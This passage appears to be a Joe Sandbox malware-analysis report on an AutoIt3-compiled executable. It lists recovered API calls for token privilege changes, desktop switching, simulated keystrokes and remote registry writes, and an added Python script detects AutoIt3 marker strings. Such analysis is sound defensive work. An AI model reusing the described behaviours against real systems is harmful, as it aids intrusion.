                                                                                                                                                  • Opcode Fuzzy Hash: e09cf8f158240847f163746c94635338a8ca539da29f0f4cb2d32bb0dd1ac3f6
                                                                                                                                                  • Instruction Fuzzy Hash: 1D01B571D0DB409ECB258B348C083767BB46F56310F4DCB9AE08D9B1A3D2708D09CB52
                                                                                                                                                  APIs
                                                                                                                                                  • __lock_file.LIBCMT ref: 004248A6
                                                                                                                                                    • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __getptd_noexit__lock_file
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2597487223-0
                                                                                                                                                  • Opcode ID: 067e945b42619cd5e532bb4c940c68e511b21f2bac583ba92795690b8c8a8ee6
                                                                                                                                                  • Instruction ID: a5fe8b5ebddeabdc03b7defa85b5706b3c04092d14be9d7edba4dc341e0ab760
                                                                                                                                                  • Opcode Fuzzy Hash: 067e945b42619cd5e532bb4c940c68e511b21f2bac583ba92795690b8c8a8ee6
                                                                                                                                                  • Instruction Fuzzy Hash: B4F0F431B11224EBDF11BFB2AC053AE36A0EF41328F91440EF42096281DB7C8951DB5D
                                                                                                                                                  APIs
                                                                                                                                                  • FreeLibrary.KERNEL32(?,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E7E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3664257935-0
                                                                                                                                                  • Opcode ID: 5e403c8a90df1ee0e06371f2d57000cd02bd76b5d635224a6d232ab0319aed21
                                                                                                                                                  • Instruction ID: e65952a518aebd30c2be6c87fe4ab6250acd6cacf129c027b051fb699af34d37
                                                                                                                                                  • Opcode Fuzzy Hash: 5e403c8a90df1ee0e06371f2d57000cd02bd76b5d635224a6d232ab0319aed21
                                                                                                                                                  • Instruction Fuzzy Hash: 85F01CB1501711CFCB349F64E494817B7E1BF94369320893FE2D692650C7359844DB84
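The FreeLibrary record above carries the string >>>AUTOIT NO CMDEXECUTE<<< as a call argument. That string is a marker of the AutoIt3 interpreter stub, which is how a compiled AutoIt binary can be recognised in a process dump before the embedded script itself has been extracted. The following Python script is an added example and not part of the Joe Sandbox report: it scans a file or memory dump for that marker and for two further AutoIt3 markers (>>>AUTOIT SCRIPT<<< and the script-resource magic AU3!EA06) that the author of the example knows from AutoIt3 binaries, checking both ASCII and UTF-16LE encodings. The marker list is the example's own assumption, the sample buffer is constructed inline, and the function names are the example's own.

```python
"""Scan a file or memory dump for AutoIt3 interpreter marker strings.

Added example for this report; it is not Joe Sandbox code. The marker list is
an assumption drawn from the author's familiarity with AutoIt3 binaries, and
the sample buffer below is constructed so the script runs offline.
"""
from __future__ import annotations

import sys
from typing import Dict, List

# Assumed AutoIt3 markers: the first appears verbatim in the report's
# FreeLibrary record; the other two are the second interpreter string and the
# magic that opens the compiled-script resource.
AUTOIT_MARKERS = [
    b">>>AUTOIT NO CMDEXECUTE<<<",
    b">>>AUTOIT SCRIPT<<<",
    b"AU3!EA06",
]


def _find_all(haystack: bytes, needle: bytes) -> List[int]:
    """Return every byte offset at which needle occurs in haystack
    (overlapping matches included)."""
    hits: List[int] = []
    start = 0
    while True:
        idx = haystack.find(needle, start)
        if idx < 0:
            return hits
        hits.append(idx)
        start = idx + 1


def scan_autoit_markers(data: bytes) -> Dict[str, List[int]]:
    """Map each marker to the sorted offsets where it occurs.

    AutoIt3 is a Unicode build, so the interpreter strings are normally stored
    as UTF-16LE in the binary, while the resource magic is plain ASCII. Both
    encodings are searched for every marker so neither layout is missed.
    """
    found: Dict[str, List[int]] = {}
    for marker in AUTOIT_MARKERS:
        offsets = _find_all(data, marker)
        offsets += _find_all(data, marker.decode("ascii").encode("utf-16-le"))
        if offsets:
            found[marker.decode("ascii")] = sorted(offsets)
    return found


def is_autoit_compiled(data: bytes) -> bool:
    """True when at least one AutoIt3 marker is present in the buffer."""
    return bool(scan_autoit_markers(data))


# Constructed sample: padding, the two interpreter strings as UTF-16LE and the
# resource magic as ASCII, laid out the way they sit inside a compiled AutoIt3
# executable. Offsets: first string at 64, second at 132, magic at 202.
SAMPLE = (
    b"\x00" * 64
    + ">>>AUTOIT NO CMDEXECUTE<<<".encode("utf-16-le")
    + b"\x00" * 16
    + ">>>AUTOIT SCRIPT<<<".encode("utf-16-le")
    + b"\x00" * 32
    + b"AU3!EA06"
    + b"\x00" * 8
)

# Constructed control buffer with no AutoIt markers at all.
CLEAN_SAMPLE = b"MZ" + b"\x90" * 200


def main(argv: List[str]) -> int:
    """Scan the file given on the command line, or the built-in sample."""
    if len(argv) > 1:
        with open(argv[1], "rb") as fh:
            data = fh.read()
    else:
        data = SAMPLE
    hits = scan_autoit_markers(data)
    for marker, offsets in hits.items():
        print(f"{marker!r}: {', '.join(hex(o) for o in offsets)}")
    print("AutoIt3 markers present" if hits else "no AutoIt3 markers")
    return 0 if hits else 1


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it with the path to a dumped module or the original executable (for example one of the .sdmp files listed in the record) to get the marker offsets; the exit status is 0 when a marker is found, so the script can be dropped into a triage pipeline. Overlapping matches are kept deliberately: a marker that is part of a larger repeated pattern should still be reported at every position.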
                                                                                                                                                  APIs
                                                                                                                                                  • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 004207B0
                                                                                                                                                    • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: LongNamePath_memmove
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2514874351-0
                                                                                                                                                  • Opcode ID: 5311bc10bcd02c3da6376a961da6fa5eeea3c1e89524b7fc1d9ecfef85fbf38f
                                                                                                                                                  • Instruction ID: 9246c12fdc37fcd41ca4db90d4c6e7f6585ba1f285f6c4ea688713946de2f6cd
                                                                                                                                                  • Opcode Fuzzy Hash: 5311bc10bcd02c3da6376a961da6fa5eeea3c1e89524b7fc1d9ecfef85fbf38f
                                                                                                                                                  • Instruction Fuzzy Hash: F5E0263290012817C720E2599C05FEA77ACDF882A0F0401BAFC0CD3204D964AC808694
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __fread_nolock
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2638373210-0
                                                                                                                                                  • Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                                                                                                  • Instruction ID: 3b5d1e22e3b7b83ea6e308f8ce2403907d65c91d4ff9c09852f69d04d9ef645c
                                                                                                                                                  • Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                                                                                                  • Instruction Fuzzy Hash: BDE092B0204B005BD7388A24D800BA373E1AB05304F00091EF2AAC3341EB67B841C75D
                                                                                                                                                  APIs
                                                                                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 00BF68EB
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1738404215.0000000000BF6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BF6000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_bf6000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                  • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                                                                                                  • Instruction ID: 7b72b803f5292c56d46f2064076d04e9aa029a7faf929cfaaff9839dd9f4baa9
                                                                                                                                                  • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                                                                                                  • Instruction Fuzzy Hash: 34E08C31A0520CEBCB20CBBC8C08AB973E8DB09320F1086A9EE1AC3280D5718E48A654
                                                                                                                                                  APIs
                                                                                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 00BF68BB
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1738404215.0000000000BF6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BF6000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_bf6000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                  • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                                                                                                  • Instruction ID: 6a694922e0432cc202ca835d0ad92e72b6cb5e69f9afba7c403a7db373df0c15
                                                                                                                                                  • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                                                                                                  • Instruction Fuzzy Hash: 27D0A73090520CEBCB10CFB49C049EA73E8DB05360F104799FE15C32C0D6319D489760
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: __wfsopen
• String ID:
• API String ID: 197181222-0
APIs
Memory Dump Source
• Source File: 00000001.00000002.1738404215.0000000000BF6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BF6000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_bf6000_x.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
APIs
Memory Dump Source
• Source File: 00000001.00000002.1738404215.0000000000BF6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BF6000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_bf6000_x.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
APIs
  • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
• DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0048CB37
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0048CB95
• GetWindowLongW.USER32(?,000000F0), ref: 0048CBD6
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0048CC00
• SendMessageW.USER32 ref: 0048CC29
• _wcsncpy.LIBCMT ref: 0048CC95
• GetKeyState.USER32(00000011), ref: 0048CCB6
• GetKeyState.USER32(00000009), ref: 0048CCC3
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0048CCD9
• GetKeyState.USER32(00000010), ref: 0048CCE3
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0048CD0C
• SendMessageW.USER32 ref: 0048CD33
• SendMessageW.USER32(?,00001030,?,0048B348), ref: 0048CE37
• ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0048CE4D
• ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0048CE60
• SetCapture.USER32(?), ref: 0048CE69
• ClientToScreen.USER32(?,?), ref: 0048CECE
• ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0048CEDB
• InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0048CEF5
• ReleaseCapture.USER32 ref: 0048CF00
• GetCursorPos.USER32(?), ref: 0048CF3A
• ScreenToClient.USER32(?,?), ref: 0048CF47
• SendMessageW.USER32(?,00001012,00000000,?), ref: 0048CFA3
• SendMessageW.USER32 ref: 0048CFD1
• SendMessageW.USER32(?,00001111,00000000,?), ref: 0048D00E
• SendMessageW.USER32 ref: 0048D03D
• SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0048D05E
• SendMessageW.USER32(?,0000110B,00000009,?), ref: 0048D06D
• GetCursorPos.USER32(?), ref: 0048D08D
• ScreenToClient.USER32(?,?), ref: 0048D09A
• GetParent.USER32(?), ref: 0048D0BA
• SendMessageW.USER32(?,00001012,00000000,?), ref: 0048D123
• SendMessageW.USER32 ref: 0048D154
• ClientToScreen.USER32(?,?), ref: 0048D1B2
• TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0048D1E2
• SendMessageW.USER32(?,00001111,00000000,?), ref: 0048D20C
• SendMessageW.USER32 ref: 0048D22F
• ClientToScreen.USER32(?,?), ref: 0048D281
• TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0048D2B5
  • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
• GetWindowLongW.USER32(?,000000F0), ref: 0048D351
Strings
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
• String ID: @GUI_DRAGID$F$pbL
• API String ID: 3977979337-2097280626
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: _memmove$_memset
• String ID: ]K$3cA$DEFINE$P\K$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_A
• API String ID: 1357608183-1426331590
APIs
• GetForegroundWindow.USER32(00000000,?), ref: 004048DF
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0043D665
• IsIconic.USER32(?), ref: 0043D66E
• ShowWindow.USER32(?,00000009), ref: 0043D67B
• SetForegroundWindow.USER32(?), ref: 0043D685
• GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0043D69B
• GetCurrentThreadId.KERNEL32 ref: 0043D6A2
• GetWindowThreadProcessId.USER32(?,00000000), ref: 0043D6AE
• AttachThreadInput.USER32(?,00000000,00000001), ref: 0043D6BF
• AttachThreadInput.USER32(?,00000000,00000001), ref: 0043D6C7
• AttachThreadInput.USER32(00000000,?,00000001), ref: 0043D6CF
• SetForegroundWindow.USER32(?), ref: 0043D6D2
• MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D6E7
• keybd_event.USER32(00000012,00000000), ref: 0043D6F2
• MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D6FC
• keybd_event.USER32(00000012,00000000), ref: 0043D701
• MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D70A
• keybd_event.USER32(00000012,00000000), ref: 0043D70F
• MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D719
• keybd_event.USER32(00000012,00000000), ref: 0043D71E
• SetForegroundWindow.USER32(?), ref: 0043D721
• AttachThreadInput.USER32(?,?,00000000), ref: 0043D748
Strings
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
• String ID: Shell_TrayWnd
• API String ID: 4125248594-2988720461
                                                                                                                                                  • Opcode ID: c65cf632393a49513bea40c5a00901192d62317a1410f3ef3d84c68e5820f373
                                                                                                                                                  • Instruction ID: c1ca6a344bcdfaba0e974823023d667c19296b4d148af4653ab9434bf50545cf
                                                                                                                                                  • Opcode Fuzzy Hash: c65cf632393a49513bea40c5a00901192d62317a1410f3ef3d84c68e5820f373
                                                                                                                                                  • Instruction Fuzzy Hash: AE319671A40318BBEB206F619C49F7F7F6CEB48B50F10443AFA04EA1D1D6B45D11ABA9
APIs
  • Part of subcall function 004587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
  • Part of subcall function 004587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
  • Part of subcall function 004587E1: GetLastError.KERNEL32 ref: 00458865
• _memset.LIBCMT ref: 00458353
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 004583A5
• CloseHandle.KERNEL32(?), ref: 004583B6
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004583CD
• GetProcessWindowStation.USER32 ref: 004583E6
• SetProcessWindowStation.USER32(00000000), ref: 004583F0
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0045840A
  • Part of subcall function 004581CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00458309), ref: 004581E0
  • Part of subcall function 004581CB: CloseHandle.KERNEL32(?,?,00458309), ref: 004581F2
Strings
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
• String ID: $default$winsta0
• API String ID: 2063423040-1027155976
• Opcode ID: 0ddeae3dc57cf593c62668a5198c180965c612a3f0a563ffd60b2d372adb3bab
• Instruction ID: 3323b63beeccf06d974511bf231c05544c13643482a2b8641c754c26865e528a
• Opcode Fuzzy Hash: 0ddeae3dc57cf593c62668a5198c180965c612a3f0a563ffd60b2d372adb3bab
• Instruction Fuzzy Hash: F3814871900209BFDF119FA5DC45AEE7B78AF08305F14416EFC10B6262EF399A19DB28
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 0046C78D
• FindClose.KERNEL32(00000000), ref: 0046C7E1
• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0046C806
• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0046C81D
• FileTimeToSystemTime.KERNEL32(?,?), ref: 0046C844
• __swprintf.LIBCMT ref: 0046C890
• __swprintf.LIBCMT ref: 0046C8D3
  • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
• __swprintf.LIBCMT ref: 0046C927
  • Part of subcall function 00423698: __woutput_l.LIBCMT ref: 004236F1
• __swprintf.LIBCMT ref: 0046C975
  • Part of subcall function 00423698: __flsbuf.LIBCMT ref: 00423713
  • Part of subcall function 00423698: __flsbuf.LIBCMT ref: 0042372B
• __swprintf.LIBCMT ref: 0046C9C4
• __swprintf.LIBCMT ref: 0046CA13
• __swprintf.LIBCMT ref: 0046CA62
Strings
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
• String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
• API String ID: 3953360268-2428617273
• Opcode ID: 77525ac0cfac28e2ae67cd84ccd41d374f9895f2458c58216a587ca322c69e5f
• Instruction ID: 7d9c3182f1c50569ad22dcb29b7867164fdd6ce968260aea251e7ba13e5350ae
• Opcode Fuzzy Hash: 77525ac0cfac28e2ae67cd84ccd41d374f9895f2458c58216a587ca322c69e5f
• Instruction Fuzzy Hash: AFA13EB1504304ABC710EFA5C885DAFB7ECFF94708F40492EF585D6192EA38DA08CB66
APIs
• FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0046EFB6
• _wcscmp.LIBCMT ref: 0046EFCB
• _wcscmp.LIBCMT ref: 0046EFE2
• GetFileAttributesW.KERNEL32(?), ref: 0046EFF4
• SetFileAttributesW.KERNEL32(?,?), ref: 0046F00E
• FindNextFileW.KERNEL32(00000000,?), ref: 0046F026
• FindClose.KERNEL32(00000000), ref: 0046F031
• FindFirstFileW.KERNEL32(*.*,?), ref: 0046F04D
• _wcscmp.LIBCMT ref: 0046F074
• _wcscmp.LIBCMT ref: 0046F08B
• SetCurrentDirectoryW.KERNEL32(?), ref: 0046F09D
• SetCurrentDirectoryW.KERNEL32(004B8920), ref: 0046F0BB
• FindNextFileW.KERNEL32(00000000,00000010), ref: 0046F0C5
• FindClose.KERNEL32(00000000), ref: 0046F0D2
• FindClose.KERNEL32(00000000), ref: 0046F0E4
Strings
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
• String ID: *.*
• API String ID: 1803514871-438819550
• Opcode ID: 6ca42bdee5e764a2d4c938babfd9147ccfee36eb28773e9f100ec5c7d0d625b2
• Instruction ID: e0d4b25dfa95f140917fd6c0b332215adfde449a0ea65fd213ed944f24ec6cf3
• Opcode Fuzzy Hash: 6ca42bdee5e764a2d4c938babfd9147ccfee36eb28773e9f100ec5c7d0d625b2
• Instruction Fuzzy Hash: EC31E7325011187ADF14EFA4EC48AEF77AC9F44360F10057BE844D2191EB79DA88CB6E
APIs
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00480953
• RegCreateKeyExW.ADVAPI32(?,?,00000000,0048F910,00000000,?,00000000,?,?), ref: 004809C1
• RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00480A09
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00480A92
• RegCloseKey.ADVAPI32(?), ref: 00480DB2
• RegCloseKey.ADVAPI32(00000000), ref: 00480DBF
Strings
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
